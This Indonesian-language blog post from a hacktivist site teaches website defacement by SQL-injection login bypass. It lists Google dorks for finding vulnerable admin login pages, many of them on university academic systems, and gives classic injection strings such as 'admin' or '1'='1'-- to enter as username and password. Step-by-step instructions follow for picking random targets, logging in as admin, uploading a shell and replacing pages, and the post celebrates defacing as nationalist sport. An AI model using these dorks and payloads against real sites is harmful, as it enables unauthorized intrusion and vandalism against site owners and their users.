Skip to content Skip to sidebar Skip to footer

Cara Deface Bypass Admin 2021

ANONIMINDO.NET - Deface adalah kegiatan menyisipkan file kedalam sebuah website, baik padahalaman index mau pun halaman yang masih memiliki hubungan dengan web tersebut. Pada umumnya kegiatan ini dilakukan dengan tujuan untuk bersenang-senang saja, tapi ada juga sebagian dari mereka yang memiliki tujuan berbeda-beda. Seseorang yang melakukan tehnik deface, biasanya di sebut sebagai seorang Hacktivist. Namun karena karena tehnik ini sudah sangat terkenal, orang-orang pun menjuluki mereka sebagai seorang Defacer.

Ada juga defacer yang memiliki team. Tapi tak sedikit juga yang memilih untuk bergerak sendiri, istilah ini disebut sebagai Solo Player. Indonesia merupakan negara dengan jumlah defacer terbanyak diseluruh dunia, hingga saat ini belum ada negara yang bisa mengimbanginya. Jauh sebelum mengenal android, banyak sekali para defacer dari negara luar yang menyerang website publik milik Indonesia, tetapi para defacer dari tanah air berhasil mencegah mereka. Kasus yang sama pernah terjadi pada saat ajang pembukaan Sea Games di Malaysia, hal ini terjadi karena posisi bendera Indonesia yang diletakkan secara terbalik. Melihat kejadian tersebut, para defacer Indonesia langsung menyerang website publik milik Malaysia. Tertulis sebuah pesan yang mereka tinggalkan, "Benderaku negaraku, bukan mainan!".


Berbicara soal hal tersebut, saya juga sudah lama tidak melakukan kegiatan ini. Wajar, karena jaman para defacer sudah hampir punah. Tapi ada saatnya para defacer Indonesia akan kembali lagi membeberkan dunia Cyber lewat kekuatannya, ditunggu saja. Nah, kali ini kita akan belajar sedikit tutorial mengenai Deface. Tutorial ini sangat simple kok, karena ini adalah tehnik pertama yang saya pelajari dulu. Jadi, sudah pasti akan berhasil jika kamu mencobanya.

Bypass Admin adalah metode yang akan kita gunakan kali ini, karena ini adalah metode paling mudah daripada yang lainnya. Berbeda dengan metode atau tehnik deface lain, karena kita tidak harus bersusah payah lagi untuk mencari kelemahan pada website target dengan menggunakan metode bypass admin ini. Yang kita butuhkan hanya 3, yaitu Dork, Username dan Password. Jadi, kita akan memasuki web tersebut layaknya seperti Admin. Bagaimana, menarik bukan? Jika ya, silahkan ikuti terus tutorialnya.

Seperti yang sudah saya jelaskan tadi, bahwasannya kita membutuhkan dork, pass dan username untuk melakukan kegiatan ini. Jika kamu tidak memiliki perlengkapan tersebut, mungkin kamu harus menggunakan racikan dari saya berikut ini:

Kumpulan Dork Bypass Admin 2021

inurl:login[4"admin"] site:
inurl / mnux=login admin
inurl >:& quot mnux =& quot akademik
inurl / mnux=login powered by sisfo
inurl :/? mnux login
inurl / mnux=login akademik administrasi akademik - universitas sisfokampus
inurl / mnux=login id /?mnux=login&lgn=frm siakad
inurl >:& quot mnux =& quot akademik
inurl://admin login.php

Tabel diatas adalah kumpulan dork bypass admin yang bisa kamu gunakan sepuasnya. Jika menurutmu itu masih kurang, kamu harus meraciknya agar lebih menarik lagi. Dork tersebut berguna untuk mencari target website secara random, jadi tidak menentu. Jika tidak ingin random, maka kamu harus memiliki Live Target (Target langsung) terlebih dahulu. Sebenarnya masih banyak lagi jumlah dork yang sudah saya racikan, tetapi tidak mungkin jika saya letakkan semuanya disini. Namun, saya sudah menaruhnya ditempat yang berbeda. Silahkan sobat lihat saja kelanjutannya berikut: Kumpulan Dork Bypass Admin Login.


Setelah memiliki dork, maka yang kita butuhkan adalah username dan password. Pada metode bypass admin ini, user dan pass adalah sama. Jika usernamenya adalah Anonimindo, maka password adalah Anonimindo juga. Bagaimana, apakah sudah mengerti dengan maksud saya? Jika ya, silahkan langsung comot user dan pass pada tabel berikut.

User dan Pass Bypass Admin 2021

'=''or'
or 1=1
or 1=1--
or 1=1#
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='

Tabel diatas adalah user dan password yang akan kita gunakan sewaktu login di web target nanti. Sebenarnya, itu bukanlah user dan pass asli sang admin. Tetapi, user dan pass tersebut bisa kita gunakan untuk login di websitenya. Kok bisa? Ya, karena ada sedikit celah keamanan terhadap website tersebut.

Password dan Usernamenya sama ya sobat. Misalnya usernamenya adalah OR 1=1, maka passwordnya adalah OR 1=1 juga. Sudah mengerti? Ya, saya rasa begitu. Baiklah, berikut ini tutorialnya:

Cara Deface Bypass Admin di Android

1. Silahkan buka browser kamu.

2. Kemudian salin dork yang tertera pada tabel pertama.

3. Tempel dork tersebut di kotak pencarian GooGle, dan cari.

4. Setelah itu, google akan memperlihatkan beberapa web hasil dari dork tersebut. Cukup pilih salah satu target yang kamu inginkan.

5. Jika kamu melihat halaman form login, halaman tersebut adalah tempat yang digunakan pemilik web tersebut untuk login.

6. Nah, silahkan isi user dan passwordnya dengan menggunakan tabel kedua. Jika gagal, kamu harus menggunakan user dan pass yang lain.

7. Jika kamu berhasil, maka kamu akan memasuki halaman layaknya seperti sang Admin. Selesai!

Jadi, itu adalah cara deface bypass admin terbaru. Tutorial ini memang sangat mudah sobat, tapi efeknya sangat berbahaya. Jika kamu berhasil, maka kamu bebas merubah semua isi didalam web tersebut. Misalnya seperti mengganti foto admin, merubah halaman index, upload shell, tempel script deface, dan masih banyak lagi.

Jika gagal, itu tandanya sudah tidak Vuln karena sudah di Patch oleh Adminnya. Jadi, silahkan gunakan dork yang lain. Terima kasih karena sudah membaca tulisan saya, jangan lupa juga untuk membaca tulisan lainnya dari kami. Selamat mencoba!
Anonymous Indonesia
Anonymous Indonesia Hanya Seorang Pecandu Internet

Post a Comment for "Cara Deface Bypass Admin 2021"